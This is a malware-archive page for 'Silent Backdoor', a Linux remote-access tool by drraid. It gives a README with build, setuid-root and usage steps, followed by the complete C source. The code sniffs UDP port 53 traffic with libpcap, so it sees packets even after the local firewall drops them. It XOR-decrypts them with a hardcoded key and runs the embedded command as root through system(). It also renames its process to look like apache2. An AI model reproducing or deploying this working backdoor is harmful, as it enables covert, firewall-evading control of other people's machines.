I Feel Lucky I Feel Very Lucky

Silent Backdoor

Copyright © MegaSecurity

By drraid

Informations
Author drraid
Family Silent Backdoor
Category Remote Access
Version Silent Backdoor
Language C
Additional Information 
-[ Packet Sniffing Backdoor Example	
-[ written by drraid at gmail dot com	
-[ for dtors.ath.cx & drraid's sec labs	   
--
-[ big middle finger to microsoft
-[ GNU GPL'd code				 


This is a dirty tool. A poorly written dirty tool ...
(im sorry there are almost no comments in it).  Just say no. 
The key with this program is demonstate a connectionless backdoor that
gets past  the local netfilter running on a linux box

Many people said I was full of shit when I told them a packet sniffer 
will read packets even if netfilter drops them.  With that in mind, if
a packet sniffer were to sniff for commands, and run them as a backdoor
it could be sneaky evil ninja. No connection would be noticed, and
even if the local firewall dropped the packet containing its commands,
it would still do its duty.  Now what if you encrypted it so someone
else sniffing wouldnt know what the packet was supposed to be intended for?

This tool is not written well.  It is not in its entirity and I am 
aware of several bugs it has.  I have left it this way and posted it
because it does function -- i would strongly recommend not using it
without re-writing or making changes.

Requirements:
	
	Linux (untested on other systems)
	GCC 
	libpcap and libnet


Compiling:
	
	$ ./makedoor
	$ ./makekey

*Should build two files*: silence and key

then:

	# chmod +s silence

Running:

	# ./silence & 


the above runs the backdoor: note it changes its process base name to: 
/usr/sbin/apache2 -k start -DSSL 

This is set by #define BASENAME in silentdoor.c

If anything prints on the screen when ran, ie: '<' character 
then the backdoor failed (probably because you weren't root)

Using the key:

	# ./key ip.ip.ip.ip:53 "command to exec"

runs the command.  HERES THE CATCH:  all output is printed to stdout 
of the remote machine.  ITS OUTPUTTED ON YOUR TARGET BOX -- someone will
notice if you start causin issues.  This is one of those bugs ;D
Another is if you run a program like 'login'  for the command to exec
you will probably lose control of the backdoor until/if it restarts

CONCLUSION:

	It is possible to have a pcap based backdoor.
	This stuff is GNU GPL
	and it is included in the folder with the sources n stuff.
	contact: drraid [at] gmail

	
	
	
SOURCE	
/* 

	PCAP-BASED SNIFFING BACKDOOR
	"Silent Backdoor" -- connectionless
	written by drraid, drraid @ gmail  
	
	Reads from encrypted UDP port 53 packet,
	even if the packet is dropped by local firewall >;]
	
	This is horrible code.  It functions but is buggy.  
	Meant more as a 'demo'.  Read the README

	yo sup to 503, dtors.ath.cx, syncrew, #coder-underground,
	bash, kaptin, vershun, poof, maru and other crazy bastards 

	as always, BIG MIDDLE FINGER TO MICROSOFT


*/



#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pcap.h>
#include <netdb.h>

#define PASS 		"leet"
#define BASENAME 	"/usr/sbin/apache2 -k start -DSSL"

void in_pkt(u_char *other_stuff, const struct pcap_pkthdr* pkt_head, const u_char* packet)
{
	int i, x, v;
	char *ptr1, *ptr2, *ptr3;
	char pktstore[1024];
	char tempbuf[1024];
	char decrypts[1024];

	memset(tempbuf, '\0', sizeof(tempbuf));
	memset(pktstore, '\0', sizeof(pktstore));
	memset(decrypts, '\0', sizeof(decrypts));

	v = (pkt_head->caplen - 44);

	memcpy(pktstore, packet+44,  (v=(v < (sizeof(pktstore)-1)?v:(sizeof(pktstore)-1))));

	for (i = 0; i <= (v+(v%4)); i+=4) 
		strncat(tempbuf, PASS, 4);
	for (i = 0; i < v; ++i)
	{
		decrypts[i]=(pktstore[i] ^ tempbuf[i]);
	} 

	if (NULL != (ptr1=strstr(decrypts, "-dc$")))
	{
		if (NULL != (ptr2=strstr(ptr1, "$dc")))
		{
			memset(tempbuf, '\0', sizeof(tempbuf));
			strncpy(tempbuf, ptr1+4, (ptr2 - (ptr1 + 4)));	
			system(tempbuf);
		}	
	}

}

int catchpacket(void )
{
	char errbuf[PCAP_ERRBUF_SIZE];
	char filter_string[]="udp port 53";
	pcap_t *sniff_session;
	struct pcap_pkthdr pkt_head;
	struct bpf_program filter;
	const char *payload;
	u_char *packet;
	int pkt_adlen;
	u_char *p_info;
	bpf_u_int32 mask;
	bpf_u_int32 net;

	if (-1 == pcap_lookupnet(NULL, &net, &mask, errbuf))
	{
		printf("\n<\n");
		exit(0);
	}

	if ((sniff_session=pcap_open_live(NULL, BUFSIZ, 1, 0, errbuf))==NULL)
	{
		printf("\n<\n");
		exit(0);
	}		
	pcap_compile(sniff_session, &filter, filter_string, 0, net);
	pcap_setfilter(sniff_session, &filter);
	pcap_loop(sniff_session, 0, in_pkt, 0);	
	return(0);
}

int main(int argc, char *argv[])
{
	int x;
	strcpy(argv[0], BASENAME);
	setuid(0);
	setgid(0);
	x=catchpacket();	
	return (0);
}

If you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.